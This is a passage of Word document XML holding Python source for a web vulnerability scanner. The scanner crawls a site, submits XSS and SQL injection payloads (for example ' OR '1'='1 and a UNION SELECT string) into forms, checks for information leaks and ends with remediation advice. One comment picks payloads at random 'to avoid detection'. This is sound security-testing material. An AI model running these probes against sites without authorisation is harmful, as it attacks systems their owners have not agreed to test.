      </w:r>
    </w:p>
    <w:p w14:paraId="68939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action = urllib.parse.urljoin(url, action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1B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122E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the form method (default is GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D647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method = form_details.get("method", "get").lower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D41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62A0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form inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B8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inputs = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364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input_tag in form_details.find_all("input"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77990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input_type = input_tag.get("type", "text")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF8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input_name = input_tag.get("name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05965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1B548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input_name and input_type != "submit" and input_type != "hidden":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F32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inputs.append({"type": input_type, "name": input_name})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544DB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BCF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Construct data to submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B72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data = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193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input_data in inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD2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data[input_data["name"]] = xss_payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B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7EB3A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Submit the form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B8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method == "post":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847E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self.make_request(action, method="POST", data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E113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536E9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self.make_request(action, method="GET", params=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD53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799C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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71864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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB5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1639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if XSS payload is reflected in the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE8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xss_payload in response.text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A072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print(f"[!] XSS vulnerability found in form at {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C9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self.results["xss_vulnerable"].append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690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"url": url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBD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"form_action": action,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124E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"method": method,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DA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"inputs": [i["name"] for i in inputs]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CE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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED3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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66877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29EB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43CD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40A3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test_sql_injection(self, url, form_details):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C511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"""Test if a form is vulnerable to SQL injection attacks"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F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sqli_payloads = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6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"' OR '1'='1", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA01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"\" OR \"1\"=\"1", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC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"1' OR '1'='1' --", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B4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"' OR 1=1 #", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D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"' UNION SELECT 1,2,3 --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22658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6B84E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FEB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Select a payload at random to avoid detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459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sqli_payload = random.choice(sqli_payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2A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A248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the form action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A9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action = form_details.get("action", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916D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action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708B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action = url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451D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elif not action.startswith("http"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5C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action = urllib.parse.urljoin(url, action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E999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0499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the form method (default is GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E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method = form_details.get("method", "get").lower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B978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5BD4A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Get form inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7062B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inputs = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFCC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input_tag in form_details.find_all("input"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1E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input_type = input_tag.get("type", "text")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454A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input_name = input_tag.get("name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1D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77812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input_name and input_type != "submit" and input_type != "hidden":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0638D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inputs.append({"type": input_type, "name": input_name})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E99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583A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Construct data to submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DF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data = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437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input_data in inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74978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data[input_data["name"]] = sqli_payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD5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04916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Submit the form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FA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method == "post":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358C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self.make_request(action, method="POST", data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7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3E27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response = self.make_request(action, method="GET", params=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A909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6C4D6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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC8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4F98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for common SQL error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53C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sql_errors = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611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"SQL syntax",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852F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"mysql_fetch_array",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E9E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"mysql_fetch",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA6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"mysql_num_rows",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4D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"mysql_result",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695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"pg_exec",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE3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"SQLite3::query",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9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"ORA-01756",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E22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"Microsoft SQL Server",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F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"ODBC SQL Server Driver",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178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"OLE DB Provider for SQL Server",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BE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"Incorrect syntax near"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A7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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65D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2C44F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error in sql_errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D1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error in response.text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9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print(f"[!] SQL Injection vulnerability found in form at {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D9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self.results["sqli_vulnerable"].append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D689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"url": url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1A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"form_action": action,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DD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"method": method,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C160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"inputs": [i["name"] for i in inputs],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49056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"error": error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3AD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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E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26F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7BCCD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E2AD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check_information_disclosure(self, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0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"""Check for information disclosure in HTTP headers and HTML comments"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7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response = self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D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not response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA12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6354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info_disclosures = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83E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6421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HTTP headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2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sensitive_headers = ["server", "x-powered-by", "x-aspnet-version", "x-asp-version"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED6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header in sensitive_headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202C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header in response.headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9DC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info_disclosures.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0918A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"type": "header",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AFB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"name": header,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2E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"value": response.headers[header]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F73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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2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60E12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HTML comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710C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comment_pattern = r'&lt;!--(?:.|[\r\n])*?--&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C7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comments = re.findall(comment_pattern, response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E0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 comment in comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A35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Check if comment contains sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDA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sensitive_patterns = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF5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r'password', r'username', r'todo', r'fixme', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29002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r'bug', r'debug', r'api[_-]?key', r'secret',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5C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r'db', r'database', r'config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A468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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71839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7C24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pattern in sensitive_patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13252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re.search(pattern, comment, re.IGNORECASE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6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info_disclosures.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73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"type": "comment",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E869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"pattern": pattern,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E8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"comment": comment[:100] + "..." if len(comment) &gt; 100 else comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5AF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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB0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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E7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060D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info_disclosures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACE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print(f"[!] Information disclosure found at {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200DF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self.results["info_disclosure"].append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41439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"url": url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FE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"findings": info_disclosures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0F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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE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 True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196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AB48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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA24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608A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scan_url(self, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0F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"""Scan a single URL for vulnerabilities"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011F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url in self.visited_urls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326DF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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D699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68D5D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self.visited_urls.add(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E531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print(f"\n[*] Scanning URL: {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298DC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1280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Check for information disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE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self.check_information_disclosure(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4FD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5C44E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Extract and test forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6A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forms = self.extract_forms(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C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forms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7A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print(f"[*] Found {len(forms)} forms on {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CC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form in forms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDF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Test for XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2571A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self.test_xss_vulnerability(url, form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9D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1906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# Test for SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063A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self.test_sql_injection(url, form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E821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29C8F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crawl_and_scan(self, max_urls=20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10355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"""Crawl the website and scan each page"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79691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print(f"[*] Starting crawl of {self.target_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A16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urls_to_visit = [self.target_url]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246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7C6FF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while urls_to_visit and len(self.visited_urls) &lt; max_urls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C82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url = urls_to_visit.pop(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A030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if url in self.visited_urls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F50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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBE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Scan the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6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self.scan_url(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEF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3CB6A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# Extract links and add to queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E39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response = self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3B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if not response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F1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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF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soup = BeautifulSoup(response.text, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF8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for link in soup.find_all('a', href=True):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7F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href = link['href']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDB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if not href.startswith('http'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B34C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href = urllib.parse.urljoin(url, href)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B69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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D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# Only follow links on the same domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D59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if self.base_domain in href and href not in self.visited_urls and href not in urls_to_visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5448B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urls_to_visit.append(href)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5E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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4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print(f"Error crawling {url}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D469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193A6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generate_report(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC49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"""Generate a security report based on scan results"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD8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 = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD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report.append("=== WEB VULNERABILITY SCAN REPORT ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A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report.append(f"Target: {self.target_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC6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report.append(f"Scan Date: {time.strftime('%Y-%m-%d %H:%M:%S')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA1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report.append(f"Pages Scanned: {len(self.visited_urls)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8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36F8F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XSS vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA8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self.results["xss_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05483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report.append(f"\n[!] CROSS-SITE SCRIPTING (XSS) VULNERABILITIES: {len(self.results['xss_vulnerable'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14504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vuln in self.results["xss_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A40B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URL: {vuln['url']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97D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Form Action: {vuln['form_action']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA42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Method: {vuln['method'].upper()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EF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Vulnerable Inputs: {', '.join(vuln['inputs'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044C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report.append("")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05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05AAE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report.append("\n[+] No XSS vulnerabilities detected")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF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6E32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SQL Injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EB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self.results["sqli_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130D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report.append(f"\n[!] SQL INJECTION VULNERABILITIES: {len(self.results['sqli_vulnerable'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE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vuln in self.results["sqli_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF5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URL: {vuln['url']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43815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Form Action: {vuln['form_action']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299F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Method: {vuln['method'].upper()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A996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Vulnerable Inputs: {', '.join(vuln['inputs'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB4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Error Message: {vuln['error']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040EF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report.append("")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47939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2A1CC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report.append("\n[+] No SQL Injection vulnerabilities detected")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31999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6122B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Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695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self.results["info_disclosure"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04349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report.append(f"\n[!] INFORMATION DISCLOSURE: {len(self.results['info_disclosure'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505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info in self.results["info_disclosure"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DD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URL: {info['url']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D29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for finding in info['findings']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040C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if finding['type'] == 'header':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774D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report.append(f"  Header: {finding['name']}: {finding['value']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13563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elif finding['type'] == 'comment':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F858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        report.append(f"  HTML Comment (contains '{finding['pattern']}'): {finding['comment']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF0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report.append("")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A460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56629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report.append("\n[+] No information disclosure detected")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769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0A227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Open Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B2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self.results["open_directories"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B9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report.append(f"\n[!] OPEN DIRECTORIES: {len(self.results['open_directories'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448E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directory in self.results["open_directories"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48442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{directory}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C5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32E4E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report.append("\n[+] No open directories detected")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19873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8B5E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Interesting Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585A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self.results["interesting_files"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE0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report.append(f"\n[!] INTERESTING FILES: {len(self.results['interesting_files'])}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876F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for file in self.results["interesting_files"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112D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URL: {file['url']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401E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Content-Type: {file['content_type']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A358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report.append(f"  Size: {file['size']} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36330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report.append("")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC5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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2ED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report.append("\n[+] No interesting files detected")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46C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9D19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Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250E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report.append("\n=== SECURITY RECOMMENDATIONS ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D152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AEB0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self.results["xss_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381A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report.append("1. Implement proper input validation and output encoding to prevent XSS attacks")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D0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Use HTML entity encoding for user-supplied content")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ACB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Implement Content Security Policy (CSP) headers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE2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A75A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self.results["sqli_vulnerable"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9D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report.append("2. Use parameterized queries or prepared statements for database operations")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B07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Never concatenate user input directly into SQL queries")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D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Implement input validation and use an ORM if possible")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26797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86E6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self.results["info_disclosure"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC9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report.append("3. Remove sensitive information from HTTP headers and HTML comments")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC93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Configure web server to hide version information")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58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Remove developer comments from production code")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAC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42AA0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self.results["open_directories"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779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report.append("4. Disable directory listing on your web server")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06A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report.append("   - Add 'Options -Indexes' in Apache .htaccess or equivalent for your server")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B695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5F467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report.append("5. General security best practices:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4D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   - Keep all software and libraries updated")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE97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   - Implement strong HTTPS configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B84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   - Set appropriate security headers (X-XSS-Protection, X-Frame-Options, etc.)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75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report.append("   - Implement proper authentication and session management")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD0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01F8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'\n'.join(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439F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78442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def run(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B12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"""Run the full scanner"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B5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print(f"[*] Starting vulnerability scan of {self.target_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83B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455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Discover directories and files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D49B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self.discover_directories()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310D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self.discover_files()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A0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0F980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Crawl and scan the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D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self.crawl_and_scan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3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1F3A5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Generate and return report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E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return self.generate_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA3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</w:p>
    <w:p w14:paraId="54499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# Example usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F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 = argparse.ArgumentParser(description='Web Application Vulnerability Scanner')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34405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parser.add_argument('url', help='Target URL to scan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC9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parser.add_argument('-t', '--threads', type=int, help='Number of threads', default=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FD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parser.add_argument('-o', '--output', help='Output file for report')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCD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args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BCA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5985B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173F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scanner = WebVulnScanner(args.url, threads=args.threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB5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report = scanner.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F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05A04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print("\n" + "=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CE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print(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64901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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61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# Save report if requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779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if args.output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27D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with open(args.output, 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD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    f.write(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245D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print(f"\nReport saved to {args.output}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4501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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC9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KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C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print("\nScan interrupted by user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AB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sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C99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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FC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print(f"Error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D5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zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5C35C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70DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CF70D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0B60D73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20B60D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97229DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="597229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3A57249"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63A572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AE60B2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AE60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136"/>
    <w:rsid w:val="00457136"/>
    <w:rsid w:val="00466D37"/>
    <w:rsid w:val="0098718F"/>
